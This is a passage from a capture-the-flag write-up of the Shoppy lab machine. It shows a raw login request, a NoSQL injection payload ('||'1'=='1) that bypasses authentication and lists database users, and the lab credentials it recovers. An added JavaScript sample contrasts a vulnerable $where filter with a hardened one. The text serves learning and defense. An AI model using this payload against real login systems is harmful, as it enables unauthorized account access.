Foothold

Back to the login page. I noticed that every time I would insert a single ' into the username field, the request would just die. This led me down an SQL injection rabbit hole that led me nowhere until I found something about it possibly being a NoSQL injection vulnerability.

Definitely learnt something new that added an entirely new page to my webapp checklist 😄

Change the Content-Type and the parameter format to JSON:

POST /login HTTP/1.1
Host: shoppy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 42
Origin: http://shoppy.htb
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://shoppy.htb/login
Upgrade-Insecure-Requests: 1
Priority: u=0, i

{"username":"admin", "password":"admin"}

We get the same response when we send the request, but if we omit a parameter the application errors out.

Note this for later:

/home/jaeger/ShoppyApp/

Injecting query operators didn't end up working, so I turned to Ippsec, and he displayed the following payload to append:

'||'1'=='1

We get a valid login.
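As an added example (not code from the Shoppy application or from this writeup), the following assumes a hypothetical Node login handler that splices the submitted username and password into a MongoDB $where expression, the pattern the appended '||'1'=='1 payload defeats, and places it beside the hardened filter a defender would use: plain-string checks that also refuse operator objects such as {"$ne": null}, and a structured equality query instead of code. The document and credentials are constructed for the demo.

```javascript
// Hypothetical vulnerable pattern (assumption, not the real app): user input is
// concatenated into a JavaScript expression that MongoDB evaluates for $where.
function buildVulnerableFilter(username, password) {
  return {
    $where: `this.username == '${username}' && this.password == '${password}'`,
  };
}

// Local stand-in for MongoDB's server-side $where evaluation: run the
// expression with `this` bound to a candidate document. Demo only.
function whereMatches(filter, doc) {
  return Boolean(new Function(`return (${filter.$where});`).call(doc));
}

// Hardened version: both fields must be non-empty strings of sane length
// (an object like {"$ne": null} fails typeof), the query is a structured
// equality match rather than code, and the password never enters the query;
// it is verified against the stored hash after the lookup.
function buildSafeFilter(body) {
  const { username, password } = body ?? {};
  for (const [name, value] of [["username", username], ["password", password]]) {
    if (typeof value !== "string" || value.length === 0 || value.length > 128) {
      throw new TypeError(`${name} must be a non-empty string`);
    }
  }
  return { username };
}

// Walk-through with the writeup's payload appended to the username "admin".
const injected = "admin" + "'||'1'=='1";
const adminDoc = { username: "admin", password: "constructed-secret" }; // constructed

// Vulnerable: the expression becomes
//   this.username == 'admin'||'1'=='1' && this.password == 'wrong'
// and `&&` binds tighter than `||`, so the admin document matches without
// the password ever being checked.
console.log(whereMatches(buildVulnerableFilter(injected, "wrong"), adminDoc)); // true
console.log(whereMatches(buildVulnerableFilter("admin", "wrong"), adminDoc));  // false

// Hardened: the payload is only a literal username value and matches nothing.
const safe = buildSafeFilter({ username: injected, password: "wrong" });
console.log(safe.username === adminDoc.username); // false
try {
  buildSafeFilter({ username: { $ne: null }, password: "wrong" });
} catch (e) {
  console.log(e.message); // username must be a non-empty string
}
```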

Using the same payload, we can find all users within the database:

'||'1'=='1
josh:remembermethisway

Log into the Mattermost application.

And don't be rude:

jaeger:Sh0ppyBest@pp!
